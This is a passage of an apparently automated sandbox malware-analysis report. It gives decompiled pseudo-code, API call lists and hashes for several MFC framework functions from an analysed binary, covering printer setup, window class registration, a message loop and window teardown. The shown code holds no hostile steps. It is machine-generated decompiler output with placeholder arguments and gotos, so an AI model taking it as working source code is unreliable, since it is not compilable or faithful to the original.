                  0x0041ce6a
                  0x0041ce81
                  0x0041ce88
                  0x0041cea0
                  0x0041cea5
                  0x0041ceaa
                  0x0041ceaa
                  0x0041ceb0
                  0x0041ceb0
                  0x0041ce60
                  0x0041ceb5
                  0x0041ceb9

                  APIs
                  • GlobalLock.KERNEL32(?,?,?,?,?,?,0040FA4A,?), ref: 0041CE3A
                  • lstrcmpW.KERNEL32(00000000,?,?,?,?,?,?,0040FA4A,?), ref: 0041CE47
                  • OpenPrinterW.WINSPOOL.DRV(?,?,00000000,?,?,?,?,?,0040FA4A,?), ref: 0041CE59
                  • DocumentPropertiesW.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000000,?,?,00000000,?,?,?,?,?,0040FA4A,?), ref: 0041CE79
                  • GlobalAlloc.KERNEL32(00000042,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00000000,?,?,?,?), ref: 0041CE81
                  • GlobalLock.KERNEL32(00000000,?,?,?,?,?,0040FA4A,?), ref: 0041CE8B
                  • DocumentPropertiesW.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000002,?,?,?,?,?,0040FA4A,?), ref: 0041CE98
                  • ClosePrinter.WINSPOOL.DRV(?,00000000,?,?,00000000,00000000,00000002,?,?,?,?,?,0040FA4A,?), ref: 0041CEB0
                    • Part of subcall function 00420981: GlobalFlags.KERNEL32(?), ref: 00420990
                    • Part of subcall function 00420981: GlobalUnlock.KERNEL32(?,?,?,?,0041D54A,?,00000414,004084DF,?,?,004084AF), ref: 004209A2
                    • Part of subcall function 00420981: GlobalFree.KERNEL32(?), ref: 004209AD
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: Global$DocumentLockProperties$AllocCloseFlagsFreeOpenPrinterPrinter.Unlocklstrcmp
                  • String ID:
                  • API String ID: 168474834-0
                  • Opcode ID: bedf1e10ced3285de7250cc8c666455f1f5cfd4d124595d5aa942ecaeb77b161
                  • Instruction ID: bbd677760f138881dd7ae0489db86b231f3a396aeeebb2e27cef093158ae2043
                  • Opcode Fuzzy Hash: bedf1e10ced3285de7250cc8c666455f1f5cfd4d124595d5aa942ecaeb77b161
                  • Instruction Fuzzy Hash: 0F1191B1940604BBDB319FA6CC89DAFBBFDFB88744B00041AF645D2221DB39D951DB28
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Function 00411247, Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 244UNIQUE
                  Download Yara Rule
                  C-Code - Quality: 94%
                  			E00411247(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags, signed int _a4) {
				intOrPtr _v8;
				signed int _v12;
				signed int _v16;
				char* _v20;
				signed int _v28;
				intOrPtr _v32;
				intOrPtr _v40;
				intOrPtr _v52;
				signed int _v56;
				void* __ebp;
				intOrPtr _t127;
				void* _t133;
				intOrPtr _t135;
				signed int _t145;
				signed int _t150;
				signed int _t183;
				signed int _t185;
				signed int _t187;
				signed int _t189;
				signed int _t191;
				signed int _t195;
				void* _t198;
				intOrPtr _t199;
				signed int _t209;

				_t198 = __ecx;
				_t127 = E0042083D(__ebx, __edi, __esi, __eflags);
				_v8 = _t127;
				_t3 =  &_a4;
				 *_t3 = _a4 &  !( *(_t127 + 0x18));
				if( *_t3 == 0) {
					return 1;
				}
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t209 = 0;
				E004281D0(0,  &_v56, 0, 0x28);
				_v52 = DefWindowProcW;
				_t133 = E0042083D(__ebx, 0, 0, __eflags);
				__eflags = _a4 & 0x00000001;
				_v40 =  *((intOrPtr*)(_t133 + 8));
				_t135 =  *0x44fc50; // 0x10003
				_t195 = 8;
				_v32 = _t135;
				_v16 = _t195;
				if(__eflags != 0) {
					_push( &_v56);
					_v56 = 0xb;
					_v20 = L"AfxWnd90su";
					_t191 = E00410F44(_t195, _t198, 0, 0, __eflags);
					__eflags = _t191;
					if(_t191 != 0) {
						_t209 = 1;
						__eflags = 1;
					}
				}
				__eflags = _a4 & 0x00000020;
				if(__eflags != 0) {
					_v56 = _v56 | 0x0000008b;
					_push( &_v56);
					_v20 = L"AfxOleControl90su";
					_t189 = E00410F44(_t195, _t198, 0, _t209, __eflags);
					__eflags = _t189;
					if(_t189 != 0) {
						_t209 = _t209 | 0x00000020;
						__eflags = _t209;
					}
				}
				__eflags = _a4 & 0x00000002;
				if(__eflags != 0) {
					_push( &_v56);
					_v56 = 0;
					_v20 = L"AfxControlBar90su";
					_v28 = 0x10;
					_t187 = E00410F44(_t195, _t198, 0, _t209, __eflags);
					__eflags = _t187;
					if(_t187 != 0) {
						_t209 = _t209 | 0x00000002;
						__eflags = _t209;
					}
				}
				__eflags = _a4 & 0x00000004;
				if(__eflags != 0) {
					_v56 = _t195;
					_v28 = 0;
					_t185 = E00411203(_t198, __eflags,  &_v56, L"AfxMDIFrame90su", 0x7a01);
					__eflags = _t185;
					if(_t185 != 0) {
						_t209 = _t209 | 0x00000004;
						__eflags = _t209;
					}
				}
				__eflags = _a4 & _t195;
				if(__eflags != 0) {
					_v56 = 0xb;
					_v28 = 6;
					_t183 = E00411203(_t198, __eflags,  &_v56, L"AfxFrameOrView90su", 0x7a02);
					__eflags = _t183;
					if(_t183 != 0) {
						_t209 = _t209 | _t195;
						__eflags = _t209;
					}
				}
				__eflags = _a4 & 0x00000010;
				if(__eflags != 0) {
					_v12 = 0xff;
					_t209 = _t209 | E0040E900(_t195, _t198, _t209, __eflags,  &_v16, 0x3fc0);
					_t48 =  &_a4;
					 *_t48 = _a4 & 0xffffc03f;
					__eflags =  *_t48;
				}
				__eflags = _a4 & 0x00000040;
				if(__eflags != 0) {
					_v12 = 0x10;
					_t209 = _t209 | E0040E900(_t195, _t198, _t209, __eflags,  &_v16, 0x40);
					__eflags = _t209;
				}
				__eflags = _a4 & 0x00000080;
				if(__eflags != 0) {
					_v12 = 2;
					_t209 = _t209 | E0040E900(_t195, _t198, _t209, __eflags,  &_v16, 0x80);
					__eflags = _t209;
				}
				__eflags = _a4 & 0x00000100;
				if(__eflags != 0) {
					_v12 = _t195;
					_t209 = _t209 | E0040E900(_t195, _t198, _t209, __eflags,  &_v16, 0x100);
					__eflags = _t209;
				}
				__eflags = _a4 & 0x00000200;
				if(__eflags != 0) {
					_v12 = 0x20;
					_t209 = _t209 | E0040E900(_t195, _t198, _t209, __eflags,  &_v16, 0x200);
					__eflags = _t209;
				}
				__eflags = _a4 & 0x00000400;
				if(__eflags != 0) {
					_v12 = 1;
					_t209 = _t209 | E0040E900(0x400, _t198, _t209, __eflags,  &_v16, 0x400);
					__eflags = _t209;
				}
				__eflags = _a4 & 0x00000800;
				if(__eflags != 0) {
					_v12 = 0x40;
					_t209 = _t209 | E0040E900(0x400, _t198, _t209, __eflags,  &_v16, 0x800);
					__eflags = _t209;
				}
				__eflags = _a4 & 0x00001000;
				if(__eflags != 0) {
					_v12 = 4;
					_t209 = _t209 | E0040E900(0x400, _t198, _t209, __eflags,  &_v16, 0x1000);
					__eflags = _t209;
				}
				__eflags = _a4 & 0x00002000;
				if(__eflags != 0) {
					_v12 = 0x80;
					_t209 = _t209 | E0040E900(0x400, _t198, _t209, __eflags,  &_v16, 0x2000);
					__eflags = _t209;
				}
				__eflags = _a4 & 0x00004000;
				if(__eflags != 0) {
					_v12 = 0x800;
					_t209 = _t209 | E0040E900(0x400, _t198, _t209, __eflags,  &_v16, 0x4000);
					__eflags = _t209;
				}
				__eflags = _a4 & 0x00008000;
				if(__eflags != 0) {
					_v12 = 0x400;
					_t209 = _t209 | E0040E900(0x400, _t198, _t209, __eflags,  &_v16, 0x8000);
					__eflags = _t209;
				}
				__eflags = _a4 & 0x00010000;
				if(__eflags != 0) {
					_v12 = 0x200;
					_t209 = _t209 | E0040E900(0x400, _t198, _t209, __eflags,  &_v16, 0x10000);
					__eflags = _t209;
				}
				__eflags = _a4 & 0x00020000;
				if(__eflags != 0) {
					_v12 = 0x100;
					_t209 = _t209 | E0040E900(0x400, _t198, _t209, __eflags,  &_v16, 0x20000);
					__eflags = _t209;
				}
				__eflags = _a4 & 0x00040000;
				if(__eflags != 0) {
					_v12 = 0x8000;
					_t209 = _t209 | E0040E900(0x400, _t198, _t209, __eflags,  &_v16, 0x40000);
					__eflags = _t209;
				}
				__eflags = _a4 & 0x00080000;
				if(__eflags != 0) {
					_v12 = 0x1000;
					_t209 = _t209 | E0040E900(0x400, _t198, _t209, __eflags,  &_v16, 0x80000);
					__eflags = _t209;
				}
				_t199 = _v8;
				 *(_t199 + 0x18) =  *(_t199 + 0x18) | _t209;
				_t145 =  *(_t199 + 0x18);
				__eflags = (_t145 & 0x00003fc0) - 0x3fc0;
				if((_t145 & 0x00003fc0) == 0x3fc0) {
					 *(_t199 + 0x18) = _t145 | 0x00000010;
					_t209 = _t209 | 0x00000010;
					__eflags = _t209;
				}
				asm("sbb eax, eax");
				_t150 =  ~((_t209 & _a4) - _a4) + 1;
				__eflags = _t150;
				return _t150;
			}



























                  0x00411247
                  0x0041124f
                  0x00411254
                  0x0041125c
                  0x0041125c
                  0x0041125f
                  0x00000000
                  0x00411263
                  0x00411269
                  0x0041126a
                  0x0041126b
                  0x00411275
                  0x00411277
                  0x00411284
                  0x00411287
                  0x0041128c
                  0x00411295
                  0x00411298
                  0x0041129d
                  0x0041129e
                  0x004112a1
                  0x004112a4
                  0x004112a9
                  0x004112aa
                  0x004112b1
                  0x004112b8
                  0x004112bd
                  0x004112bf
                  0x004112c1
                  0x004112c1
                  0x004112c1
                  0x004112bf
                  0x004112c2
                  0x004112c6
                  0x004112c8
                  0x004112d2
                  0x004112d3
                  0x004112da
                  0x004112df
                  0x004112e1
                  0x004112e3
                  0x004112e3
                  0x004112e3
                  0x004112e1
                  0x004112e6
                  0x004112ea
                  0x004112ef
                  0x004112f0
                  0x004112f3
                  0x004112fa
                  0x00411301
                  0x00411306
                  0x00411308
                  0x0041130a
                  0x0041130a
                  0x0041130a
                  0x00411308
                  0x0041130d
                  0x00411311
                  0x00411321
                  0x00411324
                  0x00411327
                  0x0041132c
                  0x0041132e
                  0x00411330
                  0x00411330
                  0x00411330
                  0x0041132e
                  0x00411333
                  0x00411336
                  0x00411346
                  0x0041134d
                  0x00411354
                  0x00411359
                  0x0041135b
                  0x0041135d
                  0x0041135d
                  0x0041135d
                  0x0041135b
                  0x0041135f
                  0x00411363
                  0x0041136e
                  0x0041137a
                  0x0041137c
                  0x0041137c
                  0x0041137c
                  0x0041137c
                  0x00411383
                  0x00411387
                  0x0041138f
                  0x0041139b
                  0x0041139b
                  0x0041139b
                  0x0041139d
                  0x004113a1
                  0x004113ac
                  0x004113b8
                  0x004113b8
                  0x004113b8
                  0x004113bf
                  0x004113c2
                  0x004113c9
                  0x004113d1
                  0x004113d1
                  0x004113d1
                  0x004113d8
                  0x004113db
                  0x004113e2
                  0x004113ee
                  0x004113ee
                  0x004113ee
                  0x004113f5
                  0x004113f8
                  0x004113ff
                  0x0041140b
                  0x0041140b
                  0x0041140b
                  0x00411412
                  0x00411415
                  0x0041141c
                  0x00411428
                  0x00411428
                  0x00411428
                  0x0041142f
                  0x00411432
                  0x00411439
                  0x00411445
                  0x00411445
                  0x00411445
                  0x0041144c
                  0x0041144f
                  0x00411456
                  0x00411462
                  0x00411462
                  0x00411462
                  0x00411469
                  0x0041146c
                  0x00411473
                  0x0041147b
                  0x0041147b
                  0x0041147b
                  0x00411482
                  0x00411485
                  0x0041148c
                  0x00411494
                  0x00411494
                  0x00411494
                  0x0041149b
                  0x0041149e
                  0x004114a5
                  0x004114b1
                  0x004114b1
                  0x004114b1
                  0x004114b8
                  0x004114bb
                  0x004114c2
                  0x004114ce
                  0x004114ce
                  0x004114ce
                  0x004114d5
                  0x004114d8
                  0x004114df
                  0x004114e7
                  0x004114e7
                  0x004114e7
                  0x004114ee
                  0x004114f1
                  0x004114f8
                  0x00411504
                  0x00411504
                  0x00411504
                  0x00411506
                  0x00411509
                  0x0041150c
                  0x00411518
                  0x0041151a
                  0x0041151f
                  0x00411522
                  0x00411522
                  0x00411522
                  0x00411531
                  0x00411533
                  0x00411533
                  0x00000000

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: _memset
                  • String ID: @$@$AfxControlBar90su$AfxFrameOrView90su$AfxMDIFrame90su
                  • API String ID: 2102423945-3496641829
                  • Opcode ID: 6cceaf9ea324d156bfa85db5fdaeaea66b675dc4feb85c5299ba7c8ac1242083
                  • Instruction ID: 9cf35d91a07b06ad6a92d677c80e44749e622615207f3f3e31b7e7cb5f228e6a
                  • Opcode Fuzzy Hash: 6cceaf9ea324d156bfa85db5fdaeaea66b675dc4feb85c5299ba7c8ac1242083
                  • Instruction Fuzzy Hash: 469145B1D0020D6EDB50DFA5D485BDEBBF8AF04344F20856AFE18E7191E7789A84C7A4
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Function 00419453, Relevance: 10.6, APIs: 7, Instructions: 127windowCOMMON
                  Download Yara Rule
                  C-Code - Quality: 63%
                  			E00419453(intOrPtr* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr* _a8) {
				signed int _v8;
				char _v17;
				char _v18;
				signed int _v19;
				char _v28;
				long _v32;
				signed int _v36;
				char _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t43;
				signed int _t50;
				signed char _t57;
				void* _t68;
				void* _t86;
				intOrPtr* _t87;
				intOrPtr* _t88;
				signed int _t89;

				_t86 = __edx;
				_t43 =  *0x44c364; // 0xa6e2bca1
				_v8 = _t43 ^ _t89;
				_t87 = _a8;
				_t88 = __ecx;
				_push( &_v28);
				_push(_a4);
				_push(0x417);
				 *((intOrPtr*)( *__ecx + 0x118))();
				 *(_t87 + 8) =  *(_t87 + 8) ^ 0x00000004;
				_v18 = 0;
				_v17 = 0;
				 *((char*)(_t87 + 0xa)) = 0;
				 *((char*)(_t87 + 0xb)) = 0;
				if(E00429472(_t87,  &_v28, 0x14) != 0) {
					_t50 = E00411D59(_t88);
					_t69 = _t50;
					_v36 = _t50;
					E00411D8D(_t88, 0x10000000, 0, 0);
					 *((intOrPtr*)( *_t88 + 0x118))(0x416, _a4, 0, _t68);
					if( *((intOrPtr*)(_t87 + 0x10)) < 0xffffffff) {
						_v32 = SendMessageW( *(_t88 + 0x20), 0x43d, 0, 0);
						SendMessageW( *(_t88 + 0x20), 0xb, 0, 0);
						SendMessageW( *(_t88 + 0x20), 0x43c, _v32 + 1, 0);
						SendMessageW( *(_t88 + 0x20), 0x43c, _v32, 0);
						SendMessageW( *(_t88 + 0x20), 0xb, 1, 0);
						 *((intOrPtr*)(_t87 + 0x10)) =  *((intOrPtr*)(_t87 + 0x10)) + 0xf4240;
						_t69 = _v36;
					}
					 *((intOrPtr*)( *_t88 + 0x118))(_a4, _t87);
					E00411D8D(_t88, 0, _t69 & 0x10000000, 0);
					_t57 =  *((intOrPtr*)(_t87 + 9));
					_t68 = 0x415;
					if(((_t57 ^ _v19) & 0x00000001) != 0 || (_t57 & 0x00000001) != 0 &&  *_t87 != _v28) {
						_push(1);
						_push(0);
						goto L9;
					} else {
						_push( &_v52);
						_push(_a4);
						_push(0x41d);
						if( *((intOrPtr*)( *_t88 + 0x118))() != 0) {
							_push(1);
							_push( &_v52);
							L9:
							_t48 = InvalidateRect( *(_t88 + 0x20), ??, ??);
						}
					}
				}
				return E00427DFF(_t48, _t68, _v8 ^ _t89, _t86, _t87, _t88);
			}






















                  0x00419453
                  0x0041945b
                  0x00419462
                  0x00419467
                  0x0041946a
                  0x00419471
                  0x00419472
                  0x00419477
                  0x0041947c
                  0x00419482
                  0x0041948d
                  0x00419491
                  0x00419495
                  0x00419499
                  0x004194a7
                  0x004194b0
                  0x004194b9
                  0x004194c2
                  0x004194c5
                  0x004194d8
                  0x004194e2
                  0x00419501
                  0x00419504
                  0x00419515
                  0x00419524
                  0x0041952f
                  0x00419531
                  0x00419538
                  0x00419538
                  0x00419548
                  0x0041955b
                  0x00419560
                  0x00419568
                  0x0041956c
                  0x0041959b
                  0x0041959d
                  0x00000000
                  0x00419579
                  0x0041957e
                  0x0041957f
                  0x00419584
                  0x00419591
                  0x00419593
                  0x00419598
                  0x0041959f
                  0x004195a2
                  0x004195a2
                  0x00419591
                  0x0041956c
                  0x004195b5

                  APIs
                  • _memcmp.LIBCMT ref: 0041949D
                    • Part of subcall function 00411D59: GetWindowLongW.USER32(?,000000F0), ref: 00411D64
                  • SendMessageW.USER32(?,0000043D,00000000,00000000), ref: 004194F6
                  • SendMessageW.USER32(?,0000000B,00000000,00000000), ref: 00419504
                  • SendMessageW.USER32(?,0000043C,?,00000000), ref: 00419515
                  • SendMessageW.USER32(?,0000043C,?,00000000), ref: 00419524
                  • SendMessageW.USER32(?,0000000B,00000001,00000000), ref: 0041952F
                  • InvalidateRect.USER32(?,00000000,00000001), ref: 004195A2
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: MessageSend$InvalidateLongRectWindow_memcmp
                  • String ID:
                  • API String ID: 235743446-0
                  • Opcode ID: cecb05129a4dfe5713b718d7de243bcf6fc204b0a11809aaac0acef328da63e1
                  • Instruction ID: 103a916b92102e25fa1ce158748eedf17b73825095c91fdbe9e0559b18bc47bb
                  • Opcode Fuzzy Hash: cecb05129a4dfe5713b718d7de243bcf6fc204b0a11809aaac0acef328da63e1
                  • Instruction Fuzzy Hash: 8D417E31740308BBEB219B64CC56FEEBBB5BF08B10F104119FA956A2D1C7B5A9408B98
                  Uniqueness

                  Uniqueness Score: 10.55%

                  Function 0040DC98, Relevance: 10.6, APIs: 7, Instructions: 117windowCOMMON
                  Download Yara Rule
                  C-Code - Quality: 92%
                  			E0040DC98(intOrPtr* __ecx, signed int _a4) {
				int _v8;
				int _v12;
				int _v16;
				struct tagMSG* _v20;
				struct HWND__* _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				struct HWND__* _t48;
				struct tagMSG* _t49;
				signed int _t51;
				void* _t54;
				void* _t56;
				int _t59;
				long _t62;
				signed int _t66;
				void* _t69;
				intOrPtr* _t71;
				intOrPtr* _t74;

				_t70 = __ecx;
				_t74 = __ecx;
				_v16 = 1;
				_v12 = 0;
				if((_a4 & 0x00000004) == 0) {
					L2:
					_v8 = 0;
					L3:
					_t48 = GetParent( *(_t74 + 0x20));
					 *(_t74 + 0x3c) =  *(_t74 + 0x3c) | 0x00000018;
					_v24 = _t48;
					_t49 = E0041D6B4(_t76);
					_t69 = UpdateWindow;
					_v20 = _t49;
					while(1) {
						_t77 = _v16;
						if(_v16 == 0) {
							goto L15;
						}
						while(1) {
							L15:
							_t51 = E0041DAE1(_t70, 0, _t74, _t77);
							if(_t51 == 0) {
								break;
							}
							if(_v8 != 0) {
								_t59 = _v20->message;
								if(_t59 == 0x118 || _t59 == 0x104) {
									E00411E2C(_t74, 1);
									UpdateWindow( *(_t74 + 0x20));
									_v8 = 0;
								}
							}
							_t71 = _t74;
							_t54 =  *((intOrPtr*)( *_t74 + 0x88))();
							_t82 = _t54;
							if(_t54 == 0) {
								_t45 = _t74 + 0x3c;
								 *_t45 =  *(_t74 + 0x3c) & 0xffffffe7;
								__eflags =  *_t45;
								return  *((intOrPtr*)(_t74 + 0x44));
							} else {
								_push(_v20);
								_t56 = E0041D9E4(_t69, _t71, 0, _t74, _t82);
								_pop(_t70);
								if(_t56 != 0) {
									_v16 = 1;
									_v12 = 0;
								}
								if(PeekMessageW(_v20, 0, 0, 0, 0) == 0) {
									while(1) {
										_t77 = _v16;
										if(_v16 == 0) {
											goto L15;
										}
										goto L4;
									}
								}
								continue;
							}
						}
						_push(0);
						E0041CD10();
						return _t51 | 0xffffffff;
						L4:
						__eflags = PeekMessageW(_v20, 0, 0, 0, 0);
						if(__eflags != 0) {
							goto L15;
						} else {
							__eflags = _v8;
							if(_v8 != 0) {
								_t70 = _t74;
								E00411E2C(_t74, 1);
								UpdateWindow( *(_t74 + 0x20));
								_v8 = 0;
							}
							__eflags = _a4 & 0x00000001;
							if((_a4 & 0x00000001) == 0) {
								__eflags = _v24;
								if(_v24 != 0) {
									__eflags = _v12;
									if(_v12 == 0) {
										SendMessageW(_v24, 0x121, 0,  *(_t74 + 0x20));
									}
								}
							}
							__eflags = _a4 & 0x00000002;
							if(__eflags != 0) {
								L13:
								_v16 = 0;
								continue;
							} else {
								_t62 = SendMessageW( *(_t74 + 0x20), 0x36a, 0, _v12);
								_v12 = _v12 + 1;
								__eflags = _t62;
								if(__eflags != 0) {
									continue;
								}
								goto L13;
							}
						}
					}
				}
				_t66 = E00411D59(__ecx);
				_v8 = 1;
				_t76 = _t66 & 0x10000000;
				if((_t66 & 0x10000000) == 0) {
					goto L3;
				}
				goto L2;
			}























                  0x0040dc98
                  0x0040dcac
                  0x0040dcae
                  0x0040dcb1
                  0x0040dcb4
                  0x0040dcc5
                  0x0040dcc5
                  0x0040dcc8
                  0x0040dccb
                  0x0040dcd1
                  0x0040dcd5
                  0x0040dcd8
                  0x0040dcdd
                  0x0040dce3
                  0x0040dd53
                  0x0040dd53
                  0x0040dd56
                  0x00000000
                  0x00000000
                  0x0040dd58
                  0x0040dd58
                  0x0040dd58
                  0x0040dd5f
                  0x00000000
                  0x00000000
                  0x0040dd64
                  0x0040dd69
                  0x0040dd71
                  0x0040dd7e
                  0x0040dd86
                  0x0040dd88
                  0x0040dd88
                  0x0040dd71
                  0x0040dd8d
                  0x0040dd8f
                  0x0040dd95
                  0x0040dd97
                  0x0040ddce
                  0x0040ddce
                  0x0040ddce
                  0x00000000
                  0x0040dd99
                  0x0040dd99
                  0x0040dd9c
                  0x0040dda1
                  0x0040dda4
                  0x0040dda6
                  0x0040ddad
                  0x0040ddad
                  0x0040ddbf
                  0x0040dd53
                  0x0040dd53
                  0x0040dd56
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0040dd56
                  0x0040dd53
                  0x00000000
                  0x0040ddbf
                  0x0040dd97
                  0x0040ddc3
                  0x0040ddc4
                  0x00000000
                  0x0040dce8
                  0x0040dcf5
                  0x0040dcf7
                  0x00000000
                  0x0040dcf9
                  0x0040dcf9
                  0x0040dcfc
                  0x0040dd00
                  0x0040dd02
                  0x0040dd0a
                  0x0040dd0c
                  0x0040dd0c
                  0x0040dd0f
                  0x0040dd13
                  0x0040dd15
                  0x0040dd18
                  0x0040dd1a
                  0x0040dd1d
                  0x0040dd2b
                  0x0040dd2b
                  0x0040dd1d
                  0x0040dd18
                  0x0040dd31
                  0x0040dd35
                  0x0040dd50
                  0x0040dd50
                  0x00000000
                  0x0040dd37
                  0x0040dd43
                  0x0040dd49
                  0x0040dd4c
                  0x0040dd4e
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0040dd4e
                  0x0040dd35
                  0x0040dcf7
                  0x0040dd53
                  0x0040dcb6
                  0x0040dcbb
                  0x0040dcbe
                  0x0040dcc3
                  0x00000000
                  0x00000000
                  0x00000000

                  APIs
                  • GetParent.USER32(?), ref: 0040DCCB
                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0040DCEF
                  • UpdateWindow.USER32(?), ref: 0040DD0A
                  • SendMessageW.USER32(?,00000121,00000000,?), ref: 0040DD2B
                  • SendMessageW.USER32(?,0000036A,00000000,00000002), ref: 0040DD43
                  • UpdateWindow.USER32(?), ref: 0040DD86
                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0040DDB7
                    • Part of subcall function 00411D59: GetWindowLongW.USER32(?,000000F0), ref: 00411D64
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: Message$Window$PeekSendUpdate$LongParent
                  • String ID:
                  • API String ID: 2853195852-0
                  • Opcode ID: c1a3acbe7e9895445762dbb2acfecde14220914493d92d80a943c50d69b1af6a
                  • Instruction ID: b9b26f931492f6c7c68de9eea99338710849bace1e9d5f3526f958d27a40dd5b
                  • Opcode Fuzzy Hash: c1a3acbe7e9895445762dbb2acfecde14220914493d92d80a943c50d69b1af6a
                  • Instruction Fuzzy Hash: 9341AC70E00205ABDF21AFA6C848EAFBBB4FF81704F10813EE541B22A0C7799944CB19
                  Uniqueness

                  Uniqueness Score: 0.22%

                  Function 0040E351, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 104windowCOMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E0040E351(intOrPtr* __ecx) {
				struct HWND__* _v40;
				struct HWND__* _v44;
				intOrPtr _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				long _t43;
				struct HWND__* _t48;
				long _t61;
				intOrPtr* _t63;
				signed int _t64;
				void* _t69;
				intOrPtr _t71;
				intOrPtr* _t72;

				_t72 = __ecx;
				_t69 = E0041D6AB();
				if(_t69 != 0) {
					if( *((intOrPtr*)(_t69 + 0x20)) == __ecx) {
						 *((intOrPtr*)(_t69 + 0x20)) = 0;
					}
					if( *((intOrPtr*)(_t69 + 0x24)) == _t72) {
						 *((intOrPtr*)(_t69 + 0x24)) = 0;
					}
				}
				_t63 =  *((intOrPtr*)(_t72 + 0x48));
				if(_t63 != 0) {
					 *((intOrPtr*)( *_t63 + 0x50))();
					 *((intOrPtr*)(_t72 + 0x48)) = 0;
				}
				_t64 =  *(_t72 + 0x4c);
				if(_t64 != 0) {
					 *((intOrPtr*)( *_t64 + 4))(1);
				}
				 *(_t72 + 0x4c) =  *(_t72 + 0x4c) & 0x00000000;
				_t83 =  *(_t72 + 0x3c) & 1;
				if(( *(_t72 + 0x3c) & 1) != 0) {
					_t71 =  *((intOrPtr*)(E00420870(1, _t64, _t69, _t72, _t83) + 0x3c));
					if(_t71 != 0) {
						_t85 =  *(_t71 + 0x20);
						if( *(_t71 + 0x20) != 0) {
							E004281D0(_t71,  &_v52, 0, 0x30);
							_t48 =  *(_t72 + 0x20);
							_v44 = _t48;
							_v40 = _t48;
							_v52 = 0x2c;
							_v48 = 1;
							SendMessageW( *(_t71 + 0x20), 0x433, 0,  &_v52);
						}
					}
				}
				_t61 = GetWindowLongW( *(_t72 + 0x20), 0xfffffffc);
				E0040E168(_t61, _t72, GetWindowLongW, _t85);
				if(GetWindowLongW( *(_t72 + 0x20), 0xfffffffc) == _t61) {
					_t43 =  *( *((intOrPtr*)( *_t72 + 0xf8))());
					if(_t43 != 0) {
						SetWindowLongW( *(_t72 + 0x20), 0xfffffffc, _t43);
					}
				}
				E0040E297(_t61, _t72);
				return  *((intOrPtr*)( *_t72 + 0x11c))();
			}



















                  0x0040e35c
                  0x0040e363
                  0x0040e369
                  0x0040e36e
                  0x0040e393
                  0x0040e393
                  0x0040e399
                  0x0040e39b
                  0x0040e39b
                  0x0040e399
                  0x0040e39e
                  0x0040e3a3
                  0x0040e3a7
                  0x0040e3aa
                  0x0040e3aa
                  0x0040e3ad
                  0x0040e3b5
                  0x0040e3ba
                  0x0040e3ba
                  0x0040e3bd
                  0x0040e3c1
                  0x0040e3c4
                  0x0040e3cb
                  0x0040e3d0
                  0x0040e3d2
                  0x0040e3d6
                  0x0040e3e0
                  0x0040e3e5
                  0x0040e3eb
                  0x0040e3ee
                  0x0040e3ff
                  0x0040e406
                  0x0040e409
                  0x0040e409
                  0x0040e3d6
                  0x0040e3d0
                  0x0040e41f
                  0x0040e421
                  0x0040e430
                  0x0040e43c
                  0x0040e440
                  0x0040e448
                  0x0040e448
                  0x0040e440
                  0x0040e450
                  0x0040e463

                  APIs
